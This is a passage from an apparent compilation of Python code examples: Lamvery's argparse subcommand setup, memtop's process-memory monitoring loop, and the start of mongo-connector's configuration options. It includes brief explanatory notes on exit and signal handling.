    follow_args = ('-f', '--follow',)
    follow_kwargs = {
        'help': 'Watch the log events and updates the display (like `tail -f`)',
        'action': 'store_true',
        'default': False
    }
    filter_args = ('-F', '--filter',)
    filter_kwargs = {
        'help': 'Filtering pattern for the log messages',
        'default': None
    }
    interval_args = ('-i', '--interval',)
    interval_kwargs = {
        'help': 'Intervals(seconds) to watch the log events',
        'default': 1
    }
    start_args = ('-s', '--start',)
    start_kwargs = {
        'help': 'Time to start the log events watching',
        'default': None
    }
    target_args = ('-t', '--target',)
    target_kwargs = {
        'help': 'The alias of the version that is targeted for setting alias',
        'default': None
    }
    env_args = ('-e', '--env',)
    env_kwargs = {
        'help': 'Environment variables that pass to the function',
        'action': 'append',
        'default': None
    }
    write_args = ('-w', '--write-id',)
    write_kwargs = {
        'help': 'Write the id of your API to the configuration file (default: .lamvery.api.yml)',
        'action': 'store_true',
        'default': False
    }
    stage_args = ('-s', '--stage',)
    stage_kwargs = {
        'help': 'The name of the stage in API Gateway',
        'default': None
    }
    remove_args = ('-r', '--remove',)
    remove_kwargs = {
        'help': 'Remove your API',
        'action': 'store_true',
        'default': False
    }
    no_integrate_args = ('-n', '--no-integrate',)
    no_integrate_kwargs = {
        'help': 'Without automatic integration',
        'action': 'store_true',
        'default': False
    }
    kind_args = ('-k', '--kind',)
    kind_kwargs = {
        'help': 'The kind of the file (accepts "function")',
        'required': True
    }
    filename_args = ('-n', '--name',)
    filename_kwargs = {
        'help': 'The filename to put the decrypted file in the function environment',
        'required': True
    }

    parser = argparse.ArgumentParser(
        description='Yet another deploy tool for AWS Lambda in the virtualenv environment.',
        epilog='Lamvery version: {}'.format(lamvery.__version__))
    subparsers = parser.add_subparsers(title='subcommands')

    init_parser = subparsers.add_parser(
        'init',
        help='Generate initial configuration file')
    init_parser.add_argument(*conf_file_args, **conf_file_kwargs)
    init_parser.set_defaults(func=init)

    build_parser = subparsers.add_parser(
        'build',
        help='Build and archive your code and libraries to <your-function-name>.zip')
    build_parser.add_argument(*conf_file_args, **conf_file_kwargs)
    build_parser.add_argument(*single_file_args, **single_file_kwargs)
    build_parser.add_argument(*no_libs_args, **no_libs_kwargs)
    build_parser.add_argument(*env_args, **env_kwargs)
    build_parser.set_defaults(func=build)

    set_alias_parser = subparsers.add_parser(
        'set-alias',
        help='Set alias to a version of the function')
    set_alias_parser.add_argument(*alias_args, **alias_kwargs)
    set_alias_parser.add_argument(*conf_file_args, **conf_file_kwargs)
    set_alias_parser.add_argument(*dry_run_args, **dry_run_kwargs)
    set_alias_parser.add_argument(*version_args, **version_kwargs)
    set_alias_parser.add_argument(*target_args, **target_kwargs)
    set_alias_parser.set_defaults(func=set_alias)

    configure_parser = subparsers.add_parser(
        'configure',
        help='Update the remote configuration')
    configure_parser.add_argument(*conf_file_args, **conf_file_kwargs)
    configure_parser.add_argument(*dry_run_args, **dry_run_kwargs)
    configure_parser.set_defaults(func=configure)

    deploy_parser = subparsers.add_parser(
        'deploy',
        help='Deploy your code and libraries, ' +
             'update the remote configuration, and set alias (optional)')
    deploy_parser.add_argument(*alias_args, **alias_kwargs)
    deploy_parser.add_argument(*conf_file_args, **conf_file_kwargs)
    deploy_parser.add_argument(*dry_run_args, **dry_run_kwargs)
    deploy_parser.add_argument(*single_file_args, **single_file_kwargs)
    deploy_parser.add_argument(*no_libs_args, **no_libs_kwargs)
    deploy_parser.add_argument(*publish_args, **publish_kwargs)
    deploy_parser.add_argument(*env_args, **env_kwargs)
    deploy_parser.set_defaults(func=deploy)

    encrypt_parser = subparsers.add_parser('encrypt', help='Encrypt a text value using KMS')
    encrypt_parser.add_argument('text', help='The text value to encrypt')
    encrypt_parser.add_argument(*conf_file_args, **conf_file_kwargs)
    encrypt_parser.add_argument(*secret_name_args, **secret_name_kwargs)
    encrypt_parser.add_argument(*store_args, **store_kwargs)
    encrypt_parser.set_defaults(func=encrypt)

    decrypt_parser = subparsers.add_parser('decrypt', help='Decrypt the secret value using KMS')
    decrypt_parser.add_argument(*conf_file_args, **conf_file_kwargs)
    decrypt_parser.add_argument(*secret_name_args, **secret_name_kwargs)
    decrypt_parser.set_defaults(func=decrypt)

    encrypt_file_parser = subparsers.add_parser('encrypt-file', help='Encrypt a file using KMS')
    encrypt_file_parser.add_argument('path', help='The file path to encrypt')
    encrypt_file_parser.add_argument(*conf_file_args, **conf_file_kwargs)
    encrypt_file_parser.add_argument(*filename_args, **filename_kwargs)
    encrypt_file_parser.add_argument(*store_args, **store_kwargs)
    encrypt_file_parser.set_defaults(func=encrypt_file)

    events_parser = subparsers.add_parser(
        'events',
        help='Configure all events of CloudWatchEvents using the function')
    events_parser.add_argument(*alias_args, **alias_kwargs)
    events_parser.add_argument(*conf_file_args, **conf_file_kwargs)
    events_parser.add_argument(*dry_run_args, **dry_run_kwargs)
    events_parser.add_argument(*keep_empty_args, **keep_empty_kwargs)
    events_parser.set_defaults(func=events)

    invoke_parser = subparsers.add_parser(
        'invoke',
        help='Invoke the function')
    invoke_parser.add_argument(
        'json', default='{}', help='The JSON string or file to pass to the function')
    invoke_parser.add_argument(*alias_args, **alias_kwargs)
    invoke_parser.add_argument(*conf_file_args, **conf_file_kwargs)
    invoke_parser.add_argument(*version_args, **version_kwargs)
    invoke_parser.set_defaults(func=invoke)

    rollback_parser = subparsers.add_parser(
        'rollback',
        help='Rollback your code and libraries')
    rollback_parser.add_argument(*alias_args, **alias_kwargs)
    rollback_parser.add_argument(*conf_file_args, **conf_file_kwargs)
    rollback_parser.add_argument(*version_args, **version_kwargs)
    rollback_parser.set_defaults(func=rollback)

    logs_parser = subparsers.add_parser(
        'logs',
        help="Watch the function's log events on CloudWatch Logs")
    logs_parser.add_argument(*conf_file_args, **conf_file_kwargs)
    logs_parser.add_argument(*follow_args, **follow_kwargs)
    logs_parser.add_argument(*filter_args, **filter_kwargs)
    logs_parser.add_argument(*interval_args, **interval_kwargs)
    logs_parser.add_argument(*start_args, **start_kwargs)
    logs_parser.set_defaults(func=logs)

    api_parser = subparsers.add_parser(
        'api',
        help='Manage your APIs')
    api_parser.add_argument(*conf_file_args, **conf_file_kwargs)
    api_parser.add_argument(*dry_run_args, **dry_run_kwargs)
    api_parser.add_argument(*no_integrate_args, **no_integrate_kwargs)
    api_parser.add_argument(*remove_args, **remove_kwargs)
    api_parser.add_argument(*stage_args, **stage_kwargs)
    api_parser.add_argument(*write_args, **write_kwargs)
    api_parser.set_defaults(func=api)

    gen_parser = subparsers.add_parser(
        'generate',
        help='Generate skeleton files')
    gen_parser.add_argument(*conf_file_args, **conf_file_kwargs)
    gen_parser.add_argument(*kind_args, **kind_kwargs)
    gen_parser.set_defaults(func=generate)

    try:
        args = parser.parse_args()
        args.func(args)
        sys.exit(0)
    except Exception as e:
        logging.exception(e)
        sys.exit(colored(str(e), 'red'))

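The pattern above is common for argparse-based entry points: exit with status 0 on success, and hand the error message to sys.exit() on failure. A minimal runnable sketch of that exit handling follows; the `greet` subcommand and its handler are hypothetical, and only the try/except around the dispatch mirrors the example. Note that sys.exit() with a non-integer argument prints the value to stderr and exits with status 1.

import argparse
import sys


def greet(args):
    # hypothetical subcommand handler
    print('Hello, {}!'.format(args.name))


def main():
    parser = argparse.ArgumentParser(description='Demo CLI')
    subparsers = parser.add_subparsers(title='subcommands')

    greet_parser = subparsers.add_parser('greet', help='Print a greeting')
    greet_parser.add_argument('name')
    greet_parser.set_defaults(func=greet)

    try:
        args = parser.parse_args()
        args.func(args)
        sys.exit(0)  # explicit success status
    except Exception as e:
        # a non-integer argument to sys.exit() is printed to stderr
        # and the process exits with status 1
        sys.exit(str(e))


if __name__ == '__main__':
    main()
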
Example 167

Project: memtop Source File: __init__.py
def main():
    global _log, _format, _period, _rows, _firstiteration
    signal.signal(signal.SIGINT, signal_handler)

    oldMemUsage = 0

    check_py_version()

    args = get_parser().parse_args()
    _period = args.period
    verbose = args.verbose
    _log = args.log
    _rows = args.lines
    _format = args.show

    # who am I?
    user = get_command_output("whoami || echo failed")
    user = user.decode().strip()  # strip the trailing newline from whoami

    # the following two methods are not reliable
    if user == "failed":
        try:
            # getenv() returns a str (or None), so no decode is needed
            user = getenv('USER') or "failed"
        except Exception:
            pass
    if user == "failed":
        print(" ! Failed to find out the current user")

    # preparing logfile
    if _log:
        try:  # the destination might not be writeable
            if path.isfile(_logfile):
                move(_logfile, _logfile + ".old")
            lfile = open(_logfile, 'a')
            lfile.write("##Date     time   wrtble ram   swap     pgin   "
                        "pgout   IOw TopApp:PID wrtbl(KB) command\n")
            lfile.close()
        except Exception:
            print(" \033[0m \033[95m ERROR: Failed to prepare/create the "
                  "log file in current directory!\033[0m")
            _log = False

    while True:
        memD = {}  # key(~memory):real memory
        keys = ()  # list of keys (to be listed by size)
        key_pid = {}  # key(~memory):PID
        pid_mem = {}  # dictionary of PID to cur memory, redefining to empty it
        # this is an ugly workaround to make sure no two keys are the same
        margin = 0.0001
        totalMemByPmap = 0
        oldMemDtmp = {}      # dictionary of mem. in previous iteration PID:mem
        processes = 0  # count of identified processes

        # first we will identify number of processes
        for directory in listdir('/proc'):
            try:  # eliminate non-numerical dirs
                int(directory)  # directory = PID
            except ValueError:
                continue

            # calculating private memory in /proc/$PID/maps file
            try:
                realMem = get_private_mem(directory)
            except Exception:  # process probably doesn't exist anymore
                continue

            totalMemByPmap = totalMemByPmap + int(realMem)

            # creating key, this is basically real memory plus
            # a very small number
            key1 = int(realMem) + margin
            key_pid[key1] = directory
            pid_mem[directory] = realMem
            margin = margin + 0.0001
        # now we have all memory data for current iteration

        # creating list of keys - sorted
        keys = key_pid.keys()
        keys = sorted(keys, reverse=True)
        processes = len(keys)
        #print (key_pid)

        ##############  printing ##################

        # finding terminal length (doing it every iteration)
        try:
            width = int(get_command_output("stty size | awk '{print $2}'"))
        except Exception:
            width = 80
        if width < 46:
            print('\033[0m' + '\033[95;1m' + " ! Terminal width " +
                  str(width) + " not sufficient, 46 is minimum...." +
                  '\033[0m')
            width = 46

        # calculating width of individual columns
        col1, col2, col3 = 8, 11, 11
        col4 = int((width - col1 - col2 - col3 - 2) / 2)
        col5 = width - col1 - col2 - col3 - col4

        # printing header
        if _format == "numb":
            a = "previous |"
        elif _format == "graph":
            a = "change  |"
        curtime = strftime("%d %b %H:%M:%S", localtime())[-col5:]
        print("\033[0m\033[1m{:>{a}s}{:>{b}s}{:<{c}s}{:>{d}s}".format("PID |",
                                                                      "private/writ. mem |",
                                                                      "command",
                                                                      curtime,
                                                                      a=col1,
                                                                      b=col2 + col3,
                                                                      c=col4,
                                                                      d=col5))
        wtime = str("(waiting " + str(_period) + " min.)")[-col5:]
        trunc = "(might be truncated)"[:col4]
        print("{:>{a}s}{:>{b}s}{:>{c}s}{:<{d}s}{:>{e}s}\033[0m".format("|",
                                                                       "current |",
                                                                       a,
                                                                       trunc,
                                                                       wtime,
                                                                       a=col1,
                                                                       b=col2,
                                                                       c=col3,
                                                                       d=col4,
                                                                       e=col5))

        # printing body (lines with processes)
        printedlines = 0  # just count printed lines
        #print ("processes:" +processes)
        for item in keys[0:processes]:

            #print ("Doing: "+item)
            # getting the command and shortening if needed
            try:
                pid = key_pid[item]
                cmdfile = "/proc/" + str(pid) + "/cmdline"
                # /proc/<pid>/cmdline is NUL-separated; replace NULs with spaces
                with open(cmdfile, "rt") as f:
                    command = f.read().replace("\0", " ")[:col4 + col5]
            except Exception:
                continue

            #print (command)
            # getting formatted value of current memory usage
            curMem = pid_mem[pid]
            try:
                oldMem = pid_omem[pid]
            except (KeyError, NameError):  # first iteration or a new PID
                oldMem = 0

            curMemStr = format_mem_numb(curMem)
            if _format == "numb":
                s2 = format_mem_numb(oldMem) + " |"
            elif _format == "graph":
                s2 = graph_format(curMem, oldMem, _firstiteration) + " |"

            s0 = str(key_pid[item] + " |")
            s1 = str(curMemStr + " |")
            # getting rid of binary characters
            command = ''.join(s for s in command if s in printable)

            print("{:>{a}s}{:>{b}s}{:>{c}s}{:<{d}s}".format(
                s0, s1, s2, command, a=col1, b=col2, c=col3, d=col4 + col5))

            if _log and printedlines == 0:
                outline_comm = " {:>7s} {:>9.0f}  {:20s}".format(
                    pid, round(curMem / 1024, 0), command)

            printedlines = printedlines + 1
            if printedlines >= _rows:
                break

        # printing footer - info on overall cpu utilization
        totalMem, ramuse, swapuse = get_cur_mem_use()
        totalMemByPmapKB = int(round(totalMemByPmap / 1000, 1))
        curMemUsage = round(totalMemByPmapKB * 100 / float(totalMem), 1)

        if _format == "numb":
            formatting_string = "{:>18s}{:>4.1f}{:s}{:5.1f}{:<1s}"
            print(formatting_string.format("Writeable/RAM: ",
                                           curMemUsage,
                                           "%     (old value: ",
                                           oldMemUsage,
                                           "%)"))
        elif _format == "graph":
            onePrc = width / 280.0
            firstLen = int(round(min(curMemUsage, 100) * onePrc))
            if curMemUsage > 100:
                secondLen = int(round((curMemUsage - 100) * onePrc))
            else:
                secondLen = 0
            # print curMemUsage, onePrc, firstLen , secondLen
            bar = str('=' * firstLen + str('#' * secondLen))
            print("{:>18s}{:s}{:>6.1f}{:s}".format(
                "Writeable/RAM: ", bar, curMemUsage, "%"))

        else:
            print((" ! Unexpected data presentation format - internall error, "
                   "quitting..."))
            sys.exit()

        if verbose:
            print("   RAM use without cached pages: " +
                  ramuse + "% , SWAP use: " + swapuse + "%")
        if verbose or _log:
            check_swapping(_firstiteration, verbose)

        # print warning if user is not root
        if "root" not in user:
            print("")
            print("     \033[0m \033[95m WARNING: Running without ROOT "
                  "CREDENTIALS, data might be incomplete...\033[0m")

        oldMemUsage = curMemUsage
        pid_omem = pid_mem.copy()
        print("")

        _firstiteration = False

        # because of problems when piping output, but it might not be needed
        sys.stdout.flush()

        # writing logfile
        if _log:
            lfile = open(_logfile, 'a')
            outline_time = strftime("%d/%m/%Y") + " " + strftime("%H:%M") + " "
            outline_ram = " {:>5s} {:>5s} {:>5s}".format(
                str(curMemUsage), str(ramuse), str(swapuse))
            outline_pg = " {:>8.2f}{:>8.2f}{:>6.1f}".format(
                _pageinsec, _pageoutsec, _IOwaitprc)
            lfile.write(
                outline_time + outline_ram + outline_pg + outline_comm + "\n")
            lfile.close()

        sleep(_period * 60 - 2)

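Example 167 registers a SIGINT handler (its body is not shown above); a common implementation calls sys.exit() so Ctrl-C unwinds the main loop cleanly. A minimal sketch of that pattern, assuming CPython's behavior of delivering signals to the main thread; the handler below is hypothetical:

import signal
import sys
from time import sleep


def signal_handler(signum, frame):
    # sys.exit() raises SystemExit in the main thread, which
    # unwinds the sleep loop below; with no argument the status is 0
    print('\nInterrupted, exiting...')
    sys.exit(0)


def main():
    signal.signal(signal.SIGINT, signal_handler)
    while True:
        sleep(1)


if __name__ == '__main__':
    main()
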
Example 168

Project: mongo-connector Source File: connector.py
Function: get_config_options
def get_config_options():
    result = []

    def add_option(*args, **kwargs):
        opt = config.Option(*args, **kwargs)
        result.append(opt)
        return opt

    main_address = add_option(
        config_key="mainAddress",
        default="localhost:27017",
        type=str)

    # -m is for the main address, which is a host:port pair, ideally of the
    # mongos. For non sharded clusters, it can be the primary.
    main_address.add_cli(
        "-m", "--main", dest="main_address", help=
        "Specify the main address, which is a"
        " host:port pair. For sharded clusters, this"
        " should be the mongos address. For individual"
        " replica sets, supply the address of the"
        " primary. For example, `-m localhost:27217`"
        " would be a valid argument to `-m`. Don't use"
        " quotes around the address.")

    oplog_file = add_option(
        config_key="oplogFile",
        default="oplog.timestamp",
        type=str)

    # -o is to specify the oplog-config file. This file is used by the system
    # to store the last timestamp read on a specific oplog. This allows for
    # quick recovery from failure.
    oplog_file.add_cli(
        "-o", "--oplog-ts", dest="oplog_file", help=
        "Specify the name of the file that stores the "
        "oplog progress timestamps. "
        "This file is used by the system to store the last "
        "timestamp read on a specific oplog. This allows "
        "for quick recovery from failure. By default this "
        "is `config.txt`, which starts off empty. An empty "
        "file causes the system to go through all the mongo "
        "oplog and sync all the docuements. Whenever the "
        "cluster is restarted, it is essential that the "
        "oplog-timestamp config file be emptied - otherwise "
        "the connector will miss some docuements and behave "
        "incorrectly.")

    no_dump = add_option(
        config_key="noDump",
        default=False,
        type=bool)

    # --no-dump specifies whether we should read an entire collection from
    # scratch if no timestamp is found in the oplog_config.
    no_dump.add_cli(
        "--no-dump", action="store_true", dest="no_dump", help=
        "If specified, this flag will ensure that "
        "mongo_connector won't read the entire contents of a "
        "namespace iff --oplog-ts points to an empty file.")

    batch_size = add_option(
        config_key="batchSize",
        default=constants.DEFAULT_BATCH_SIZE,
        type=int)

    # --batch-size specifies num docs to read from oplog before updating the
    # --oplog-ts config file with current oplog position
    batch_size.add_cli(
        "--batch-size", type="int", dest="batch_size", help=
        "Specify an int to update the --oplog-ts "
        "config file with latest position of oplog every "
        "N docuements. By default, the oplog config isn't "
        "updated until we've read through the entire oplog. "
        "You may want more frequent updates if you are at risk "
        "of falling behind the earliest timestamp in the oplog")

    def apply_verbosity(option, cli_values):
        if cli_values['verbose']:
            option.value = 3
        if option.value < 0 or option.value > 3:
            raise errors.InvalidConfiguration(
                "verbosity must be in the range [0, 3].")

    # Default is warnings and above.
    verbosity = add_option(
        config_key="verbosity",
        default=1,
        type=int,
        apply_function=apply_verbosity)

    # -v enables verbose logging
    verbosity.add_cli(
        "-v", "--verbose", action="store_true",
        dest="verbose", help="Enables verbose logging.")

    def apply_logging(option, cli_values):
        log_mechs_enabled = [cli_values[m]
                             for m in ('logfile', 'enable_syslog', 'stdout')
                             if cli_values[m]]
        if len(log_mechs_enabled) > 1:
            raise errors.InvalidConfiguration(
                "You cannot specify more than one logging method "
                "simultaneously. Please choose the logging method you "
                "prefer. ")
        if cli_values['log_format']:
            option.value['format'] = cli_values['log_format']

        if cli_values['logfile']:
            when = cli_values['logfile_when']
            interval = cli_values['logfile_interval']
            if (when and when.startswith('W') and
                    interval != constants.DEFAULT_LOGFILE_INTERVAL):
                raise errors.InvalidConfiguration(
                    "You cannot specify a log rotation interval when rotating "
                    "based on a weekday (W0 - W6).")

            option.value['type'] = 'file'
            option.value['filename'] = cli_values['logfile']
            if when:
                option.value['rotationWhen'] = when
            if interval:
                option.value['rotationInterval'] = interval
            if cli_values['logfile_backups']:
                option.value['rotationBackups'] = cli_values['logfile_backups']

        if cli_values['enable_syslog']:
            option.value['type'] = 'syslog'

        if cli_values['syslog_host']:
            option.value['host'] = cli_values['syslog_host']

        if cli_values['syslog_facility']:
            option.value['facility'] = cli_values['syslog_facility']

        if cli_values['stdout']:
            option.value['type'] = 'stream'

        # Expand the full path to log file
        option.value['filename'] = os.path.abspath(option.value['filename'])

    default_logging = {
        'type': 'file',
        'filename': 'mongo-connector.log',
        'format': constants.DEFAULT_LOG_FORMAT,
        'rotationInterval': constants.DEFAULT_LOGFILE_INTERVAL,
        'rotationBackups': constants.DEFAULT_LOGFILE_BACKUPCOUNT,
        'rotationWhen': constants.DEFAULT_LOGFILE_WHEN,
        'host': constants.DEFAULT_SYSLOG_HOST,
        'facility': constants.DEFAULT_SYSLOG_FACILITY
    }

    logging = add_option(
        config_key="logging",
        default=default_logging,
        type=dict,
        apply_function=apply_logging)

    # -w enables logging to a file
    logging.add_cli(
        "-w", "--logfile", dest="logfile", help=
        "Log all output to the specified file.")

    logging.add_cli(
        '--stdout', dest='stdout', action='store_true', help=
        'Log all output to STDOUT rather than a logfile.')

    logging.add_cli(
        "--log-format", dest="log_format", help=
        "Define a specific format for the log file. "
        "This is based on the python logging lib. "
        "Available parameters can be found at "
        "https://docs.python.org/2/library/logging.html#logrecord-attributes")

    # -s is to enable syslog logging.
    logging.add_cli(
        "-s", "--enable-syslog", action="store_true",
        dest="enable_syslog", help=
        "The syslog host, which may be an address like 'localhost:514' or, "
        "on Unix/Linux, the path to a Unix domain socket such as '/dev/log'.")

    # --syslog-host is to specify the syslog host.
    logging.add_cli(
        "--syslog-host", dest="syslog_host", help=
        "Used to specify the syslog host."
        " The default is 'localhost:514'")

    # --syslog-facility is to specify the syslog facility.
    logging.add_cli(
        "--syslog-facility", dest="syslog_facility", help=
        "Used to specify the syslog facility."
        " The default is 'user'")

    # --logfile-when specifies the type of interval of the rotating file
    # (seconds, minutes, hours)
    logging.add_cli("--logfile-when", action="store", dest="logfile_when",
                    type="string",
                    help="The type of interval for rotating the log file. "
                    "Should be one of "
                    "'S' (seconds), 'M' (minutes), 'H' (hours), "
                    "'D' (days), 'W0' - 'W6' (days of the week 0 - 6), "
                    "or 'midnight' (the default). See the Python docuementation "
                    "for 'logging.handlers.TimedRotatingFileHandler' for more "
                    "details.")

    # --logfile-interval specifies when to create a new log file
    logging.add_cli("--logfile-interval", action="store",
                    dest="logfile_interval", type="int",
                    help="How frequently to rotate the log file, "
                    "specifically, how many units of the rotation interval "
                    "should pass before the rotation occurs. For example, "
                    "to create a new file each hour: "
                    " '--logfile-when=H --logfile-interval=1'. "
                    "Defaults to 1. You may not use this option if "
                    "--logfile-when is set to a weekday (W0 - W6). "
                    "See the Python docuementation for "
                    "'logging.handlers.TimedRotatingFileHandler' for more "
                    "details. ")

    # --logfile-backups specifies how many log files will be kept.
    logging.add_cli("--logfile-backups", action="store",
                    dest="logfile_backups", type="int",
                    help="How many log files will be kept after rotation. "
                    "If set to zero, then no log files will be deleted. "
                    "Defaults to 7.")

    def apply_authentication(option, cli_values):
        if cli_values['admin_username']:
            option.value['adminUsername'] = cli_values['admin_username']

        if cli_values['password']:
            option.value['password'] = cli_values['password']

        if cli_values['password_file']:
            option.value['passwordFile'] = cli_values['password_file']

        if option.value.get("adminUsername"):
            password = option.value.get("password")
            passwordFile = option.value.get("passwordFile")
            if not password and not passwordFile:
                raise errors.InvalidConfiguration(
                    "Admin username specified without password.")
            if password and passwordFile:
                raise errors.InvalidConfiguration(
                    "Can't specify both password and password file.")

    default_authentication = {
        'adminUsername': None,
        'password': None,
        'passwordFile': None
    }

    authentication = add_option(
        config_key="authentication",
        default=default_authentication,
        type=dict,
        apply_function=apply_authentication)

    # -a is to specify the username for authentication.
    authentication.add_cli(
        "-a", "--admin-username", dest="admin_username", help=
        "Used to specify the username of an admin user to "
        "authenticate with. To use authentication, the user "
        "must specify both an admin username and a keyFile.")

    # -p is to specify the password used for authentication.
    authentication.add_cli(
        "-p", "--password", dest="password", help=
        "Used to specify the password."
        " This is used by mongos to authenticate"
        " connections to the shards, and in the"
        " oplog threads. If authentication is not used, then"
        " this field can be left empty as the default ")

    # -f is to specify the authentication key file. This file is used by mongos
    # to authenticate connections to the shards, and we'll use it in the oplog
    # threads.
    authentication.add_cli(
        "-f", "--password-file", dest="password_file", help=
        "Used to store the password for authentication."
        " Use this option if you wish to specify a"
        " username and password but don't want to"
        " type in the password. The contents of this"
        " file should be the password for the admin user.")

    def apply_fields(option, cli_values):
        if cli_values['fields']:
            option.value = cli_values['fields'].split(",")

    fields = add_option(
        config_key="fields",
        default=[],
        type=list,
        apply_function=apply_fields)

    # -i to specify the list of fields to export
    fields.add_cli(
        "-i", "--fields", dest="fields", help=
        "Use a comma separated list of fields to specify multiple fields. "
        "Will copy over the fields specified into a new docuement."
        "The '_id', 'ns' and '_ts' fields are always "
        "exported. Supports dot notation for docuement fields but cannot span "
        "arrays. Cannot use both 'fields' and 'exclude_fields'.")

    def apply_exclude_fields(option, cli_values):
        if cli_values['exclude_fields']:
            option.value = cli_values['exclude_fields'].split(",")

    exclude_fields = add_option(
        config_key="exclude_fields",
        default=[],
        type=list,
        apply_function=apply_exclude_fields)

    # -e to specify the list of fields to exclude
    exclude_fields.add_cli(
        "-e", "--exclude_fields", dest="exclude_fields", help=
        "Use a comma separated list of fields to specify multiple "
        "fields to exclude. Will delete the fields specified from the "
        "existing docuement. The '_id', 'ns' and '_ts' fields are always "
        "exported. Supports dot notation for docuement fields but cannot span "
        "arrays. Cannot use both 'fields' and 'exclude_fields'.")

    def apply_namespaces(option, cli_values):
        if cli_values['ns_set']:
            option.value['include'] = cli_values['ns_set'].split(',')

        if cli_values['ex_ns_set']:
            option.value['exclude'] = cli_values['ex_ns_set'].split(',')

        if cli_values['gridfs_set']:
            option.value['gridfs'] = cli_values['gridfs_set'].split(',')

        if cli_values['dest_ns_set']:
            ns_set = option.value['include']
            dest_ns_set = cli_values['dest_ns_set'].split(',')
            if len(ns_set) != len(dest_ns_set):
                raise errors.InvalidConfiguration(
                    "Destination namespace set should be the"
                    " same length as the origin namespace set.")
            option.value['mapping'] = dict(zip(ns_set, dest_ns_set))

        ns_set = option.value['include']
        if len(ns_set) != len(set(ns_set)):
            raise errors.InvalidConfiguration(
                "Namespace set should not contain any duplicates.")

        ex_ns_set = option.value['exclude']
        if len(ex_ns_set) != len(set(ex_ns_set)):
            raise errors.InvalidConfiguration(
                "Exclude namespace set should not contain any duplicates.")

        # 'include' and 'exclude' must not both be set
        if ns_set and ex_ns_set:
            raise errors.InvalidConfiguration(
                "Cannot use both namespace 'include' "
                "(--namespace-set) and 'exclude' "
                "(--exclude-namespace-set).")

        # validate 'include' format
        for ns in ns_set:
            if ns.count("*") > 1:
                raise errors.InvalidConfiguration(
                    "Namespace set should be plain text "
                    "e.g. foo.bar or only contains one wildcard, e.g. foo.* .")

        # validate 'exclude' format
        for ens in ex_ns_set:
            if ens.count("*") > 1:
                raise errors.InvalidConfiguration(
                    "Exclude namespace set should be plain text "
                    "e.g. foo.bar or only contains one wildcard, e.g. foo.* .")

        dest_mapping = option.value['mapping']
        if len(dest_mapping) != len(set(dest_mapping.values())):
            raise errors.InvalidConfiguration(
                "Destination namespaces set should not"
                " contain any duplicates.")

        for key, value in dest_mapping.items():
            if key.count("*") > 1 or value.count("*") > 1:
                raise errors.InvalidConfiguration(
                    "The namespace mapping source and destination "
                    "cannot contain more than one '*' character.")
            if key.count("*") != value.count("*"):
                raise errors.InvalidConfiguration(
                    "The namespace mapping source and destination "
                    "must contain the same number of '*' characters.")

        gridfs_set = option.value['gridfs']
        if len(gridfs_set) != len(set(gridfs_set)):
            raise errors.InvalidConfiguration(
                "GridFS set should not contain any duplicates.")

    default_namespaces = {
        "include": [],
        "exclude": [],
        "mapping": {},
        "gridfs": []
    }

    namespaces = add_option(
        config_key="namespaces",
        default=default_namespaces,
        type=dict,
        apply_function=apply_namespaces)

    # -n is to specify the namespaces we want to consider. The default
    # considers all the namespaces
    namespaces.add_cli(
        "-n", "--namespace-set", dest="ns_set", help=
        "Used to specify the namespaces we want to "
        "consider. For example, if we wished to store all "
        "docuements from the test.test and alpha.foo "
        "namespaces, we could use `-n test.test,alpha.foo`. "
        "You can also use, for example, `-n test.*` to store "
        "docuements from all the collections of db test. "
        "The default is to consider all the namespaces, "
        "excluding the system and config databases, and "
        "also ignoring the \"system.indexes\" collection in "
        "any database. This cannot be used together with "
        "'--exclude-namespace-set'!")

    # -x is to specify the namespaces we dont want to consider. The default
    # is empty
    namespaces.add_cli(
        "-x", "--exclude-namespace-set", dest="ex_ns_set", help=
        "Used to specify the namespaces we do not want to "
        "consider. For example, if we wished to ignore all "
        "docuements from the test.test and alpha.foo "
        "namespaces, we could use `-x test.test,alpha.foo`. "
        "You can also use, for example, `-x test.*` to ignore "
        "docuements from all the collections of db test. "
        "The default is not to exclude any namespace. "
        "This cannot be used together with '--namespace-set'!")

    # -g is the destination namespace
    namespaces.add_cli(
        "-g", "--dest-namespace-set", dest="dest_ns_set", help=
        "Specify a destination namespace mapping. Each "
        "namespace provided in the --namespace-set option "
        "will be mapped respectively according to this "
        "comma-separated list. These lists must have "
        "equal length. "
        "It also supports mapping using wildcard, for example, "
        "map foo.* to bar_*.someting, means that if we have two "
        "collections foo.a and foo.b, they will map to "
        "bar_a.something and bar_b.something. "
        "The default is to use the identity "
        "mapping. This works for mongo-to-mongo as well as"
        "mongo-to-elasticsearch connections.")

    # --gridfs-set is the set of GridFS namespaces to consider
    namespaces.add_cli(
        "--gridfs-set", dest="gridfs_set", help=
        "Used to specify the GridFS namespaces we want to "
        "consider. For example, if your metadata is stored in "
        "test.fs.files and chunks are stored in test.fs.chunks, "
        "you can use `--gridfs-set test.fs`.")

    def apply_doc_managers(option, cli_values):
        if not option.value:
            if not cli_values['doc_manager'] and not cli_values['target_url']:
                return
            option.value = [{}]

        # Command line options should override the first DocManager config.
        cli_to_config = dict(doc_manager='docManager',
                             target_url='targetURL',
                             auto_commit_interval='autoCommitInterval',
                             unique_key='uniqueKey')
        first_dm = option.value[0]
        for cli_name, value in cli_values.items():
            if value is not None:
                first_dm[cli_to_config[cli_name]] = value

        # validate doc managers and fill in default values
        for dm in option.value:
            if not isinstance(dm, dict):
                raise errors.InvalidConfiguration(
                    "Elements of docManagers must be a dict.")
            if 'docManager' not in dm and 'docManagerClassPath' not in dm:
                raise errors.InvalidConfiguration(
                    "Every element of docManagers"
                    " must contain 'docManager' property.")
            if not dm.get('targetURL'):
                dm['targetURL'] = None
            if not dm.get('uniqueKey'):
                dm['uniqueKey'] = constants.DEFAULT_UNIQUE_KEY
            if dm.get('autoCommitInterval') is None:
                dm['autoCommitInterval'] = constants.DEFAULT_COMMIT_INTERVAL
            if not dm.get('args'):
                dm['args'] = {}
            if not dm.get('bulkSize'):
                dm['bulkSize'] = constants.DEFAULT_MAX_BULK

            aci = dm['autoCommitInterval']
            if aci is not None and aci < 0:
                raise errors.InvalidConfiguration(
                    "autoCommitInterval must be non-negative.")

        def import_dm_by_name(name):
            full_name = "mongo_connector.doc_managers.%s.DocManager" % name
            return import_dm_by_path(full_name)

        def import_dm_by_path(path):
            try:
                # importlib doesn't exist in 2.6, but __import__ is everywhere
                package, klass = path.rsplit('.', 1)
                module = __import__(package, fromlist=(package,))
                dm_impl = getattr(module, klass)
                if not issubclass(dm_impl, DocManagerBase):
                    raise TypeError("DocManager must inherit DocManagerBase.")
                return dm_impl
            except ImportError:
                raise errors.InvalidConfiguration(
